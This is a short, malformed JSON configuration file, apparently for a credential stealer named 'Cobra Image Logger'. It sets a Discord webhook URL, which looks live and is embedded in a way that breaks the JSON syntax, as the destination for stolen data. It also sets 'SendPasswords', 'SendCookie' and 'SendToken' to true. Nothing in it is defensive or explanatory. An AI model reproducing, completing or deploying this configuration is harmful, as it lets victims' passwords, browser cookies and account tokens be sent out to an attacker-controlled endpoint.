{
    "Title_Configs":[
        {

           "name": "Cobra",
           "servername": "Web",
           "program": "Cobra Image Logger"

        }
    ],

    "Webhook_config":[https://discord.com/api/webhooks/1124340499868819536/l5CrBvJKcMBms4sFu8INyJsrzha9tyssD1SwPkdqjNeFJ3g3KepovSqFfkTMn9uiiG-t
        {

          "Bot_Name": "Cobra",
          "Bot_Avatar": "https://media.discordapp.net/attachments/818904459681071126/1008774401648505013/goat6.jpg"
  
        }
    ],

    "Other_Configs":[
        {
          "SendPasswords": true,
          "SendCookie": true,
          "SendToken": true
        }
    ]


}
